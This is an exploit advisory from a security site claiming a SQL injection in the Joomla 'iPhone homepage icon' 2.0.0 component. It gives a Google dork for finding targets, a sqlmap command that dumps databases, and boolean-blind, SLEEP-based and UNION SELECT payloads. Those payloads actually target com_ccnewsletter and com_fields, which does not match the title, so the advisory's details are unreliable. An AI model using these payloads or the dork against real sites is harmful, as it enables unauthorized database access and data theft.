Joomla omponent iPhone homepage icon 2.0.0 Parameter SQL Injection

2019.04.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

"Joomla omponent iPhone homepage icon 2.0.0 Parameter SQL Injection" # Exploit Title:Joomla Component iPhone homepage icon 2.0.0 - SQL Injection # Date: 2019-04-05 # Exploit Author:mohsenmohsenzadeh # Vendor Homepage:https://extensions.joomla.org/extension/iPhone homepage icon/ # Version:2.0.0 [Final Version] # Tested on: Win,Linux # Google Dork: inurl:"index.php?option=com_iPhone homepage icon Sqlmap: sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs Testing Method: - boolean-based blind - time-based blind - UNION query Parameter: sbid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter Type: AND/OR time-based blind Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top